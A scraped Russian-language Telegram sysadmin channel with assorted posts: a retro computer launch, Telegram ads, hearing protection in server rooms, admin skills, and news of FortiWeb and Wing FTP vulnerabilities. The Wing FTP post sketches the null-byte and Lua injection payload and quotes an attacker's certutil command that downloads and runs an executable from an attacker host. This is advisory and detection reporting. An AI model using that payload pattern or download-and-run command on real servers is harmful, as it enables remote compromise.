Легендарный C64 возрождается как Commodore 64 Ultimate. Не эмулятор: FPGA-чип AMD Artix 7 точно воспроизводит «железо» 80-х, запуская 10 000+ оригинальных игр, картриджей и периферии. Уже открыт предзаказ.
В коробке:
Компьютер, блок питания, HDMI-кабель, USB-«кассетник» с 50+ играми (лицензии + демо), стикеры и мануал. Поддержка Wi-Fi для загрузки игр, но можно вставить родные картриджи или подключить дисковод.
Три версии:
✅ BASIC Beige ($299) — классический бежевый корпус;
✅ Starlight Edition ($349) — полупрозрачный корпус + мех. клавиатура со светодиодами, реагирующими на звук;
✅ Founders Edition ($499) — янтарный корпус, золотой сертификат, жетон, футболка, эксклюзивная нумерация.
Предзаказ — только на краудфандинговой платформе Commodor.
Типичный
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥42🤔9❤6💊5
Forwarded from godnoTECH - Новости IT
Теперь реклама в Telegram будет появляться прямо при просмотре видео. Новый формат баннеров уже тестируется и работает по таргетированной модели Users, то есть — только для подписчиков определённых каналов или заранее собранных аудиторий.
В Telegram Ads можно будет запускать видеобаннеры с CPM от €1. По оценкам МТС AdTech, для некоторых ниш (например, бьюти и маркетплейсы) эффективность может вырасти до 25%, а стоимость лида — снизиться на 15%. Telegram пока молчит, но рынок уже надеется на дефицитный инвентарь.
А вот аналитики настроены осторожно: большинство каналов всё ещё не выпускает регулярное видео, а гибкой настройки (по интересам, поведению и т.п.) в Telegram по-прежнему нет. Как обычно — потенциал есть, но инструмент пока сырой.
Please open Telegram to view this post
VIEW IN TELEGRAM
💊43😐14😢8😡7❤1😁1🗿1
Один из коллег-сисадминов поведал историю, которая может быть полезна многим из нас. Не выспавшись ночью он решил вздремнуть в обеденный перерыв в серверной. Идеальное, казалось бы, место. т.к темно, прохладно, а белый шум вентиляторов заглушает все посторонние звуки. Настоящая колыбель для админа!
Однако, проснувшись через час по будильнику, он почувствовал головную боль и звон в ушах. Другой админ, услышав это, с удивлением объяснил ему то, о чем многие из нас могут не задумываться. Белый шум на самом деле невероятно громкий. Из-за высокой частоты звука мозг перестает воспринимать его как громкий, но вред слуху наносится колоссальный.
В интернетах когда-то ходила байка про один старый НИИ, где айтишников посадили работать прямо в серверную. Весь отдел, включая техподдержку. Народ там сидел в свитерах и толстовках, потому что от кондиционеров постоянно дуло, а чтобы поговорить с коллегой за соседним столом, приходилось буквально перекрикиваться. Один сотрудник так отработал пять лет и начал страдать от тиннитуса (постоянного звона в ушах)
Используйте средства защиты слуха, подойдут обычные поролоновые беруши (если правильно вставлены) или специальные строительные (стрелковые) наушники
Админы, берегите свой слух! Его, как и бэкапы, нельзя восстановить, если он уже потерян.
Типичный
Please open Telegram to view this post
VIEW IN TELEGRAM
✍76👍22😱8❤7🔥4👎1🤯1🙏1
В компоненте Fabric Connector (интеграция продуктов Fortinet) обнаружена критическая уязвимость CVE-2025-25257 (9.6/10 CVSS). Атакующий без авторизации мог:
→ Выполнять произвольные SQL-запросы через поддельный Bearer-токен в заголовке Authorization;
→ Использовать SELECT... INTO OUTFILE для записи вредоносного кода на диск;
→ Запускать код через Python, получая полный контроль над системой (от имени пользователя mysql).
Уязвимые версии:
FortiWeb 7.6.0–7.6.3, 7.4.0–7.4.7, 7.2.0–7.2.10, 7.0.0–7.0.10.
Решение: Срочно обновиться до 7.6.4, 7.4.8, 7.2.11 или 7.0.11. До патча — отключить веб-интерфейсы HTTP/HTTPS.
Как починили?
Fortinet заменила небезопасные форматные строки на подготовленные выражения (prepared statements), блокирующие SQL-инъекции. Уязвимость нашёл Кентаро Кавана (GMO Cybersecurity) — эксперт по взлому Cisco.
Типичный
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥26🤷♂7🤯1
С практической точки зрения, мы сошлись на том, что нужно уметь документировать, автоматизировать и, что крайне важно, выводить из эксплуатации. Причем один мудро заметил, что порядок тут даже важнее, т.е. сначала грамотно выводим из эксплуатации старый хлам, потом документируем то, что осталось, и только потом автоматизируем. Ведь недокументированная, но чистая и понятная среда куда лучше, чем идеально описанный зоопарк из легаси-систем, который страшно трогать.
Но сошлись мы и на том, что чисто технические навыки лишь половина дела. Гораздо важнее оказались софт-скилзы, которые отличают просто исполнителя от настоящего инженера. Это, во-первых, умение учиться – постоянно и самостоятельно. Во-вторых, умение решать проблемы, то есть мыслить логически и методично, а не просто перебирать варианты. И в-третьих, что, возможно, самое сложное для многих, – умение вовремя просить о помощи. Никто не может знать всё, но хороший админ всегда знает, где найти ответ и не боится признать, что зашел в тупик. А еще важно быть человеком, с которым приятно работать, а не токсиком, отравляющим атмосферу в коллективе
В итоге, получается, что идеальный сисадмин состоит из сплава технической дисциплины, умения постоянно учиться и человеческих качеств. Эти навыки позволяют пройти главный экзамен на профпригодность: настроить всё, задокументировать и уйти в отпуск так, чтобы никто не стрессовал (ни админ, ни коллеги).
Типичный
Please open Telegram to view this post
VIEW IN TELEGRAM
👍79❤12🔥5💯3🤷♂1✍1👏1🍾1
Please open Telegram to view this post
VIEW IN TELEGRAM
😭41😁18💊7🤯3🐳3😢1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
😡58😢27🤷♂4🤯3
Please open Telegram to view this post
VIEW IN TELEGRAM
😁71🌚6😡4❤1🏆1🗿1
Please open Telegram to view this post
VIEW IN TELEGRAM
❤51🌚25🔥9💯6🍾1
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥65😁36🫡16💯9😭2
Please open Telegram to view this post
VIEW IN TELEGRAM
😁62🏆14💊12✍2🔥2❤1
Новость для всех, кто использует Wing FTP Server. В нем обнаружена критическая уязвимость CVE-2025-47812, которая позволяет удаленно выполнить код с правами SYSTEM/root.
Уязвимость уже активно эксплуатируется, так что если у вас развернут этот сервер, необходимо обновиться до версии 7.4.4.
Технически, уязвимость представляет собой комбинацию из инъекции нулевого байта (
%00) и инъекции кода на языке Lua в параметре имени пользователя при аутентификации (через loginok.html). Атакующий может отправить специально сформированный запрос, используя учетную запись, для которой известен пароль (или анонимную, если она включена). Полезная нагрузка в поле username выглядит примерно так: `` имя_пользователя%00]]...вредоносный_Lua_код...-- ``. Нулевой байт обрывает обработку строки с именем, ]] корректно закрывает синтаксис объекта сессии, а -- комментирует остаток оригинального кода. В результате вредоносный Lua-код записывается в файл сессии на сервере (файл с расширением .lua в директории session). При следующем обращении к серверу (например, при запросе страницы dir.html) он считывает этот файл, десериализует данные и выполняет внедренный код.Признаки взлома можно найти в логах сервера (
Log\Domains\) — ищите обрезанные записи вида `` User 'anonymous `` (без закрывающей кавычки). Более надежный способ — проверить файлы сессий в директории session на аномально большой размер или наличие подозрительного Lua-кода (например, функций для hex-декодирования или вызова io.popen). Один из реальных пейлоадов, который обнаружили исследователи, выглядел так: `` certutil -urlcache -f http://[IP_АТАКУЮЩЕГО]/[payload.exe] %TEMP%\mvveiWJHx.exe & start /B %TEMP%\mvveiWJHx.exe ``.А теперь самое интересное как это выглядело на практике. Аналитики из Huntress разобрали реальную атаку и выяснили, что уязвимостью воспользовались, мягко говоря, не самые опытные хакеры. Их действия были похожи на комедию ошибок: они запускали базовые команды для разведки (
ipconfig, whoami), пытались создавать пользователей с паролями вроде 123123qweqwe, делали опечатки в путях к файлам (например, c:^A.exe, где ^A — это управляющий символ SOH), пытались запустить встроенную команду dir как внешний бинарник и не смогли правильно составить curl-команду для скачивания своего же бэкдора. В конце концов, они попытались скачать и запустить пейлоад с помощью certutil, но его тут же удалил Microsoft Defender (Trojan:Win32/Ceprolad.A). После этого процесс WFTPServer.exe упал, и сессия атакующих оборвалась Эх, а ведь были прекрасные нулевые, когда для взлома сервера нужно было быть настоящим гением. А теперь достаточно просто найти готовый эксплойт на GitHub и уметь правильно скопировать команду... хотя, как видно, даже с последним у некоторых проблемы
Типичный
Please open Telegram to view this post
VIEW IN TELEGRAM
😁32❤2👍1🔥1🌚1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
💊77❤18👍11🔥6👎3⚡1😁1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
💊54🫡17🍾9🔥5❤1